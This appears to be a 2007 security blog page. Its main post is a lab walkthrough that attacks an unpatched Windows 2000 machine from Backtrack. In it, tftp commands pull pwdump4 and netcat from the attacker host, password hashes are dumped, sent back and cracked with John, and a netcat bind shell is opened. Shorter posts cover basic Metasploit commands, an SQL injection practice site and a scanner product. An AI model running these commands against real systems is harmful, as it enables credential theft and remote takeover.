Wednesday, June 27, 2007

Penetration Tester Lab

First of all, you must have your own machine to hack. In this scenario, i'll setup windows 2000 sp4 and linux redhat 6.2

this old version of linux can be download at

Download Redhat 6.2 here

Installing and Securing IIS Servers

The other machine is Backtrack that already installed into my hard disk for attacking purposes.
By default, windows 2000 sp4 is vulnerable to lsass exploit. So, make sure you patch your machine accordingly. In this lab, i won't patch it to show how the attack can be done.

Windows SP4 - 10.21.11.81
Backtrack (Attacker - 10.21.11.84)

On Backtrack, scan windows 2004 sp4 using nmap

nmap -sT -O 10.21.11.81
nmap -sV 10.21.11.81 -p 23,25,80
nmap -sU 10.21.11.81



cd /pentest/password/dictionaries
gunzip -c wordlist.txt.gz > /tmp/wordlist.txt

exploit the machine...n get the shell.

From the windows 2004, run

tftp -i 10.21.11.84 get pwdump4.exe
tftp -i 10.21.11.84 get pwdump4.dll
tftp -i 10.21.11.84 get nc.exe


pwdump4 /l /o:pwdump4.txt
tftp 10.21.11.84 put pwdump4.txt

From Backtrack,

cat pwdump4.txt
john -w:wordlist.txt pwdump4.txt
john --show pwdump4.txt
john -w:wordlist.txt -f:NT pwdump4.txt


From Windows,

nc -L -p 2111 -e cmd.exe
telnet 10.21.11.81 2111
whoami


that's it, and GAME OVER
Posted by at No comments:

Wednesday, June 13, 2007

Metasploit: 3.0-beta-dev Guide

Basic format for Metasploit

1. Pick which exploit to use
2. Configure the exploit with remote IP adress & port number
3. Pick the payload
4. Configure the payload with local IP address & port number
5. Check / Execute the exploit

Step

Command

Description

1

Show exploits

List all exploits

2

Use [exploit name]

Choose

3

Show payloads

To check all available payloads

4

Set PAYLOAD [payload name]

Set the payload

5

Show options

To check more option that can be set

6

Check

To check whether the host is exploitable or not

7

Exploit

Exploit the host
Posted by at No comments:

Monday, June 11, 2007

SQL Injection - Test your skills here

http://hackme.ntobjectives.com/sql_inject/login_get.php
Posted by at No comments:

Sunday, June 3, 2007

Network-based Application Vulnerability Assessment

AppDetective(TM) – Application Security, Inc's (AppSecInc) network-based application vulnerability assessment solution that arms you with the tools needed to secure applications/databases against unauthorized external attacks, unauthorized internal access, password cracking, and various other attacks before they occur.

https://www.appsecinc.com/cgi-bin/download.pl?download=AppDetective
Posted by at No comments:
Subscribe to: Posts (Atom)

LinkWithin

Related Posts with Thumbnails